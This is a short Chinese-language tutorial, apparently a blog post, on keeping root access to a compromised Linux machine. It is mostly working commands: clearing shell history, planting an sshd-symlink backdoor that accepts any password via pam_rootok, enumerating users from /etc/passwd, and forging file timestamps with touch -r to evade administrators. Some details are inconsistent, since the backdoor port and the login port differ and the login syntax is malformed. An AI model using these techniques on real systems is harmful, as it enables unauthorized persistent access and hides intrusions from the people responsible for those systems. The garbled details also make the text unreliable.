很多时候我们拿下机器后需要维持权限,在计划任务上加入定时反弹shell这很容易被 运维人员发现,有些场景没必要用到rootkit级别的后门,我们可以尝试使用ssh后门
1.目的
长期维持机器root权限,同时后门有需要躲避管理检测
通信隐蔽、自启动项隐藏、文件隐藏、进程/模块隐藏、注册表隐藏、服务隐藏、端口隐藏等
SSH命令痕迹清除,登陆之后先执行
unset HISTFILE;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace
每次输入命令前加上空格即可不再history中记录命令
2.后门方式
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337
3.使用使用任意密码登录系统后门
ssh root:test@192.168.116.100 -p 31338
4.查看存在哪些用户
cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" '{ print $1"|"$3"|"$4 }'|more
1 # 如下 2 root|0|0 3 sync|4|65534 4 mysql|104|109 5 postgres|113|117 6 arpwatch|117|120 7 Debian-snmp|118|123 8 speech-dispatcher|127|29 9 Debian-gdm|130|138
5.修改上传文件时间戳
touch -r 老文件时间戳 新文件时间戳
6.退出ssh
exit
注
0.任意密码登陆的核心是auth sufficient pam_rootok.so,只要PAM配置文件中包含此配置即可SSH任意密码登陆,实践表明,可成功利用的PAM配置文件除了su还有chsh、chfn
1.前提linux软连接连接ssh后门需要ssh配置允许PAM认证才能使用
2.被控主机不允许root登录,可用其他已存在用户登录